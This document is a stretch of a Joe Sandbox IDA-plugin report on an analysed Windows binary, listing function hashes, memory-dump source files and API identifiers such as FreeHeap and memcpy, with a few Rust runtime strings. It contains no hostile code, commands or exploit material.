                                            • Opcode ID: 5df30a808fa8a17a1356d99ba95b1b12b9939c89a0d9ebdad498e0ab50447879
                                            • Instruction ID: 4a1b73a065a0f3339fe7d8ae838721a4a366a1bd6374bd1ca2c93d7a4fffe155
                                            • Opcode Fuzzy Hash: 5df30a808fa8a17a1356d99ba95b1b12b9939c89a0d9ebdad498e0ab50447879
                                            • Instruction Fuzzy Hash: AE71D22194CAC291F7368B09E0967F5A3B5EFD0399F145231EB8857694FF3AD2928B40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: Value$abort$CaptureContextUnwind
                                            • String ID:
                                            • API String ID: 529571357-0
                                            • Opcode ID: 1b5c558d4ac4e6e909cb3c1c0f1fb761eef3fc0c2e22eb240701dc7aaaa2d695
                                            • Instruction ID: 72dc95b151f3a1b9dc3d6821ec1dd89c2598ceda72fcf99379d2a7456969d31c
                                            • Opcode Fuzzy Hash: 1b5c558d4ac4e6e909cb3c1c0f1fb761eef3fc0c2e22eb240701dc7aaaa2d695
                                            • Instruction Fuzzy Hash: C0618111E1CB8682FA159B1AD4A13B96360FF94744F0D92B4DE8DA27A2EF3DF5C58300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 178f0199cff1a25b23d1b691cbd38892f4a732abd732d3ec3800ec6445693df3
                                            • Instruction ID: 1d2ab583bfa794da37b132b9913922156cc5b8d92a7c076dcc0279be5983ec3e
                                            • Opcode Fuzzy Hash: 178f0199cff1a25b23d1b691cbd38892f4a732abd732d3ec3800ec6445693df3
                                            • Instruction Fuzzy Hash: 3F318021F1D70242FE599735A8F53B92290AF90B00F9C88BAC54DE73D5DE2CE881C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 075c69ad9553d33dd5667536920440fb63e1368f03fc0c9b4b3bad8e7aff9514
                                            • Instruction ID: 26269d76ff4aae832926b5df921ed917ccccaa3788a1349d52f16b6c5971116f
                                            • Opcode Fuzzy Hash: 075c69ad9553d33dd5667536920440fb63e1368f03fc0c9b4b3bad8e7aff9514
                                            • Instruction Fuzzy Hash: 1F41A620F1968681FE1A9F10D4B03BD1290AF42B44F9CA8B5C98DE77D5DE3CE486D340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 723214d7442be1b5f19d087f79caafa1d076a44c06cfffcf53402e750af741c9
                                            • Instruction ID: 774ecd51738405707f37b724d9c222a284fd0f8a9172e0a32b354683d3f3097b
                                            • Opcode Fuzzy Hash: 723214d7442be1b5f19d087f79caafa1d076a44c06cfffcf53402e750af741c9
                                            • Instruction Fuzzy Hash: 7541C021F5A712A2FE149B64D4B43B912A0EF60B45F8C48B8C94DE37DADE3CE4819300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: fb01c9216aed97a8e6dff743a867b9ea089fab6b51c2273a7fe5f9c46afad932
                                            • Instruction ID: 90feaf55ebf2a9734d528aee9194e8410f22ba9bcb886a5a5eb10aaa65004e5b
                                            • Opcode Fuzzy Hash: fb01c9216aed97a8e6dff743a867b9ea089fab6b51c2273a7fe5f9c46afad932
                                            • Instruction Fuzzy Hash: 0641545190CA8181F731DB22E0A43BE6BA0EB85754F4C00B6D78DA7AE5CF7DE484D740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 774f4946a29b8457d9a756cdbe112075d6af193c63c1c65b814184bc0bb01e8f
                                            • Instruction ID: 46713dd4095f5b9ea6340ba03eeeb51766ee514f3ec3c4bf46045230de9b36fd
                                            • Opcode Fuzzy Hash: 774f4946a29b8457d9a756cdbe112075d6af193c63c1c65b814184bc0bb01e8f
                                            • Instruction Fuzzy Hash: E841421190CA8280E731DB12E4A43FE6BA0EB85754F4C00B6DA8DA7BE6DF7DE184D740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: efa58a2dd1a3ed371b2a7e1caf76ccaefadfd44b0da612c5e053e9754b532584
                                            • Instruction ID: c5151a409936ab5e01da7424da23a1776037f65565c63bf095c1647b74179527
                                            • Opcode Fuzzy Hash: efa58a2dd1a3ed371b2a7e1caf76ccaefadfd44b0da612c5e053e9754b532584
                                            • Instruction Fuzzy Hash: 58414312A0CB8180E725DB17D0A43AE6BA1EB85B94F0C40B5DA8DA7BB6CF7CE544D704
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 7dc7f319520dcc7925c02ed6db71935fc630c1aeb33657fa4528b59a6ad22490
                                            • Instruction ID: cac4379da28ec06215a255452c5e82fe170c4024f89bb9cc8bf43ac49f5f0475
                                            • Opcode Fuzzy Hash: 7dc7f319520dcc7925c02ed6db71935fc630c1aeb33657fa4528b59a6ad22490
                                            • Instruction Fuzzy Hash: 2D41531190CA8280E771DB13E0A43BA6BA0EF85794F4C00B5DA8DA7BE6CF7DE184D744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: feeb098349cb20a49582c69fe64de17a33766d07c4d9810276f1a030a9ca0d48
                                            • Instruction ID: 8bf323a49093ea6d1414d66aa6dcc1b0d72aaf772b092db3b0c1b5f52f9e75ca
                                            • Opcode Fuzzy Hash: feeb098349cb20a49582c69fe64de17a33766d07c4d9810276f1a030a9ca0d48
                                            • Instruction Fuzzy Hash: 5E213B30F6A286A6FE149B2094F53791290EF41701F9C88B9D84EE33D6DD3CB8859380
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 4b9c873e88a66f4c50e47538b116d18438f651c5d44723fca981da471c55b9d6
                                            • Instruction ID: f5a03a6fce4e18527eacf321e07ad62b5cb7af4179b8b35f3c2136f9166dc25b
                                            • Opcode Fuzzy Hash: 4b9c873e88a66f4c50e47538b116d18438f651c5d44723fca981da471c55b9d6
                                            • Instruction Fuzzy Hash: 4E314512A0CB8180E765DB17D0D43AD6BA1EB89B94F0C40B5DA8DA7BA5CF7CE544D704
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 3c7827dbe699491df77c693d6ad17e206b008d3b0403a6458a32d7ec29a7162f
                                            • Instruction ID: b3e069d737e6e22ff1801f3ee9196a6d728708c89952ccaa771c934f4baae50f
                                            • Opcode Fuzzy Hash: 3c7827dbe699491df77c693d6ad17e206b008d3b0403a6458a32d7ec29a7162f
                                            • Instruction Fuzzy Hash: AF41335190CA8281E731D726E0A43BE6BA0EB85754F4C00B6D68DA76E6CF7DE584D740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 1d8e8b802d27584f551babdd45dac601fa5db762ec007d1bf3ac8fe67e14344f
                                            • Instruction ID: 9e389139fa8b25cc90feaf831a520065ff4a15f152b4e0a0148e20c3986f9225
                                            • Opcode Fuzzy Hash: 1d8e8b802d27584f551babdd45dac601fa5db762ec007d1bf3ac8fe67e14344f
                                            • Instruction Fuzzy Hash: 2D31425190CA8281E731D727E0E43BA6BA0EB85B54F4C40B5DA8EA76E6CF7CE584D740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 56285e7eeaef2889f1842c5a18cc1f96f9d48ce0d72b1570d1b31114b9a0ee7a
                                            • Instruction ID: de94a3423d069671eb6c54565a253fe3f9aced2a44edbd36f74e1885cba1daee
                                            • Opcode Fuzzy Hash: 56285e7eeaef2889f1842c5a18cc1f96f9d48ce0d72b1570d1b31114b9a0ee7a
                                            • Instruction Fuzzy Hash: F831455190CA8281E731D727E0A43BA6BA0EB85754F4C00B5DB8EA76F6CF7CE584D744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: freeaddrinfo
                                            • String ID:
                                            • API String ID: 2731292433-0
                                            • Opcode ID: e053a0b947790abca42476269a3970b54efc9b7f45d092e2296d4aa8f5a16982
                                            • Instruction ID: e69cc0e07b446603ba751fd80ec0df1e352e492248e8e42737a78d05d96426e6
                                            • Opcode Fuzzy Hash: e053a0b947790abca42476269a3970b54efc9b7f45d092e2296d4aa8f5a16982
                                            • Instruction Fuzzy Hash: 10717822A04A948AE705CF75D4812ED77B0FB48B4CF189125EF8DA3B59EF38D5A5C350
                                            APIs
                                            Strings
                                            • overflow when adding duration to instantlibrary\std\src\time.rs, xrefs: 00007FF6543A87EB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: overflow when adding duration to instantlibrary\std\src\time.rs
                                            • API String ID: 3510742995-3002242212
                                            • Opcode ID: ad48e3b7c6040afa8d5f9c8f5f9ec6de9241d13d6db071b1bbe300fe74734776
                                            • Instruction ID: aa1d26efaa541df34af8b21e399013cef3e85866d9637cfcfb2c38bfdab6b882
                                            • Opcode Fuzzy Hash: ad48e3b7c6040afa8d5f9c8f5f9ec6de9241d13d6db071b1bbe300fe74734776
                                            • Instruction Fuzzy Hash: 2771F522A0CAC290FB358B26D4A53F97764EF85344F488171DA8DA27E5EF3DE285C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: assertion failed: !prev.is_complete()$assertion failed: prev.is_running()
                                            • API String ID: 3298025750-900065180
                                            • Opcode ID: 19b52e27b1cdd0054160564882a6f8ec03fd565d18e81a6fa6890875ba3cba97
                                            • Instruction ID: f937c070c0362abbacc0fa3fa963ae3f90246a905a1f225fe8380093d1be6bd8
                                            • Opcode Fuzzy Hash: 19b52e27b1cdd0054160564882a6f8ec03fd565d18e81a6fa6890875ba3cba97
                                            • Instruction Fuzzy Hash: F0517622A0DB8682EA60DF12E4E43ED63A0FF85794F4841B5DA8DA37A5DF7CE145C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
